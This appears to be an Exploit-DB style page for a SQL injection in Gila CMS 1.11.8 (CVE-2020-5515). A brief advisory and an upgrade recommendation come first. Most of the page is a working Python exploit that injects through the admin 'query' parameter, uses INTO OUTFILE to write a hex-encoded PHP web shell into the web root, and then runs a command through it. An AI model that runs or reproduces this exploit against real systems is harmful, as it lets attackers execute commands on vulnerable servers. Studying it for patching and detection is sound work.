Gila CMS 1.11.8 - 'query' SQL Injection

vendor:

Gila

by:

Carlos Ramírez L. (BillyV4)

7.2

CVSS

HIGH

SQL Injection

CWE

Product Name: Gila

Affected Version From: Gila 1.11.8

Affected Version To: Gila 1.11.8

Patch Exists: YES

Related CWE: CVE-2020-5515

CPE: a:gilacms:gila:1.11.8

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Gila 1.11.8

2020

Gila CMS 1.11.8 – ‘query’ SQL Injection

A SQL injection vulnerability was discovered in Gila CMS 1.11.8. An attacker can exploit this vulnerability to inject malicious SQL queries and gain access to sensitive information from the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'query' parameter of the 'admin/sql' page. An attacker can send a specially crafted HTTP request to the vulnerable page and execute arbitrary SQL commands in the context of the application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Gila CMS.

Source

Exploit-DB raw data:

# Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection
# Date: 2020-06-15
# Exploit Author: Carlos Ramírez L. (BillyV4)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8
# Version: Gila 1.11.8
# Tested on: Gila 1.11.8
# CVE : CVE-2020-5515

import requests as req
import time as vremeto
import sys as sistemot
import re as regularno

if len(sistemot.argv) < 2:
    print("Usage: ./CVE_2020_5515.py ip:port")
    sistemot.exit(19)
else:
    ip = sistemot.argv[1]

 cookies = {'PHPSESSID': 'r2k5bp52edr9ls36d35iohdlng', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}


webpath = "/gila-1.11.8/admin/sql?query="
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "


print("[*] Injecting ")

cmdphp  = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"

url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)

vremeto.sleep(1)

print("[*] Executing")

r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")

print("You have a webshell in http://" + ip + "/" + shellname "?cmd=command")